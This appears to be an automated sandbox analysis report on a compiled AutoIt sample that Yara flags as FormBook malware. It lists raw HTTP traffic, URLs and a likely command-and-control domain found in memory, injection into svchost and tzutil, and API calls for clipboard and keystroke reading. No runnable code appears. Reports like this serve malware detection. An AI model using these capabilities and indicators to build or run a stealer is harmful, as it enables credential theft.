e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 20:48:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f

Source: SUMCVKBWRXks.exe, 00000005.00000002.3556655023.0000000006562000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3553914262.0000000004B12000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.litespeedtech.com/error-page
Source: SUMCVKBWRXks.exe, 00000005.00000002.3553008112.0000000001292000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nb-shenshi.buzz
Source: SUMCVKBWRXks.exe, 00000005.00000002.3553008112.0000000001292000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nb-shenshi.buzz/mz7t/
Source: tzutil.exe, 00000006.00000003.2399160781.000000000806E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: tzutil.exe, 00000006.00000003.2399160781.000000000806E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SUMCVKBWRXks.exe, 00000005.00000002.3556655023.00000000066F4000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3553914262.0000000004CA4000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: tzutil.exe, 00000006.00000003.2399160781.000000000806E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tzutil.exe, 00000006.00000003.2399160781.000000000806E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tzutil.exe, 00000006.00000003.2399160781.000000000806E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tzutil.exe, 00000006.00000003.2399160781.000000000806E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tzutil.exe, 00000006.00000003.2399160781.000000000806E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SUMCVKBWRXks.exe, 00000005.00000002.3556655023.0000000005A64000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3553914262.0000000004014000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3555385575.0000000006590000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2504404477.00000000212F4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
Source: tzutil.exe, 00000006.00000002.3552198154.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: tzutil.exe, 00000006.00000002.3552198154.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: tzutil.exe, 00000006.00000002.3552198154.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: tzutil.exe, 00000006.00000002.3552198154.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: tzutil.exe, 00000006.00000002.3552198154.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: tzutil.exe, 00000006.00000002.3552198154.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: tzutil.exe, 00000006.00000003.2391388247.000000000804D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: tzutil.exe, 00000006.00000003.2399160781.000000000806E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tzutil.exe, 00000006.00000003.2399160781.000000000806E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007E4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_007E4164

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007E4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_007E4164

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007E3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_007E3F66

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007D001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_007D001C

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007FCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_007FCABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.2600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.2600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3552001637.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3553295403.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2211380258.00000000071D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2208574163.0000000003DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3553008112.0000000001220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3553656900.0000000003760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3553342363.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2207975108.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00773B3A
Source: gKvjKMCUfq.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: gKvjKMCUfq.exe, 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_735715f9-6
Source: gKvjKMCUfq.exe, 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_39e8e4da-b
Source: gKvjKMCUfq.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_78e3bb89-0
Source: gKvjKMCUfq.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_22c48d41-f

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0262C9E3 NtClose,	1_2_0262C9E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0260191B NtProtectVirtualMemory,	1_2_0260191B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030735C0 NtCreateMutant,LdrInitializeThunk,	1_2_030735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072B60 NtClose,LdrInitializeThunk,	1_2_03072B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03072DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03074340 NtSetContextThread,	1_2_03074340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03073010 NtOpenDirectoryObject,	1_2_03073010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03073090 NtSetValueKey,	1_2_03073090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03074650 NtSuspendThread,	1_2_03074650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072B80 NtQueryInformationFile,	1_2_03072B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072BA0 NtEnumerateValueKey,	1_2_03072BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072BE0 NtQueryValueKey,	1_2_03072BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072BF0 NtAllocateVirtualMemory,	1_2_03072BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072AB0 NtWaitForSingleObject,	1_2_03072AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072AD0 NtReadFile,	1_2_03072AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072AF0 NtWriteFile,	1_2_03072AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030739B0 NtGetContextThread,	1_2_030739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072F30 NtCreateSection,	1_2_03072F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072F60 NtCreateProcessEx,	1_2_03072F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072F90 NtProtectVirtualMemory,	1_2_03072F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072FA0 NtQuerySection,	1_2_03072FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072FB0 NtResumeThread,	1_2_03072FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072FE0 NtCreateFile,	1_2_03072FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072E30 NtWriteVirtualMemory,	1_2_03072E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072E80 NtReadVirtualMemory,	1_2_03072E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072EA0 NtAdjustPrivilegesToken,	1_2_03072EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072EE0 NtQueueApcThread,	1_2_03072EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072D00 NtSetInformationFile,	1_2_03072D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072D10 NtMapViewOfSection,	1_2_03072D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03073D10 NtOpenProcessToken,	1_2_03073D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072D30 NtUnmapViewOfSection,	1_2_03072D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03073D70 NtOpenThread,	1_2_03073D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072DB0 NtEnumerateKey,	1_2_03072DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072DD0 NtDelayExecution,	1_2_03072DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072C00 NtQueryInformationProcess,	1_2_03072C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072C60 NtCreateKey,	1_2_03072C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072C70 NtFreeVirtualMemory,	1_2_03072C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072CA0 NtQueryInformationToken,	1_2_03072CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072CC0 NtQueryVirtualMemory,	1_2_03072CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072CF0 NtOpenProcess,	1_2_03072CF0

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007DA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_007DA1EF

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007C8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_007C8310

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007D51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_007D51BD

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_0077E6A0	0_2_0077E6A0
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_0079D975	0_2_0079D975
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_0077FCE0	0_2_0077FCE0
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007921C5	0_2_007921C5
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007A62D2	0_2_007A62D2
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007F03DA	0_2_007F03DA
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007A242E	0_2_007A242E
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007925FA	0_2_007925FA
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007CE616	0_2_007CE616
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007866E1	0_2_007866E1
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007A878F	0_2_007A878F
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007F0857	0_2_007F0857
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007A6844	0_2_007A6844
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_00788808	0_2_00788808
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007D8889	0_2_007D8889
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_0079CB21	0_2_0079CB21
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007A6DB6	0_2_007A6DB6
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_00786F9E	0_2_00786F9E
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_00783030	0_2_00783030
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_0079F1D9	0_2_0079F1D9
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_00793187	0_2_00793187
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_00771287	0_2_00771287
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_00791484	0_2_00791484
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_00785520	0_2_00785520
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_00797696	0_2_00797696
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_00785760	0_2_00785760
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_00791978	0_2_00791978
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007A9AB5	0_2_007A9AB5
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007F7DDB	0_2_007F7DDB
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_0079BDA6	0_2_0079BDA6
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_00791D90	0_2_00791D90
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_0077DF00	0_2_0077DF00
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_00783FE0	0_2_00783FE0
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_0114FFD0	0_2_0114FFD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02618903	1_2_02618903
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02602B66	1_2_02602B66
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02602B70	1_2_02602B70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02616B0E	1_2_02616B0E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02616B13	1_2_02616B13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02610383	1_2_02610383
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0260E383	1_2_0260E383
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02603050	1_2_02603050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0262F083	1_2_0262F083
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02610163	1_2_02610163
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0260274A	1_2_0260274A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02602750	1_2_02602750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0260E4D1	1_2_0260E4D1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0260E4D3	1_2_0260E4D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F132D	1_2_030F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302D34C	1_2_0302D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FA352	1_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0308739A	1_2_0308739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E3F0	1_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031003E6	1_2_031003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030452A0	1_2_030452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305B2C0	1_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C02C0	1_2_030C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E12ED	1_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305D2F0	1_2_0305D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030100	1_2_03030100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DA118	1_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C8158	1_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0307516C	1_2_0307516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310B16B	1_2_0310B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304B1B0	1_2_0304B1B0
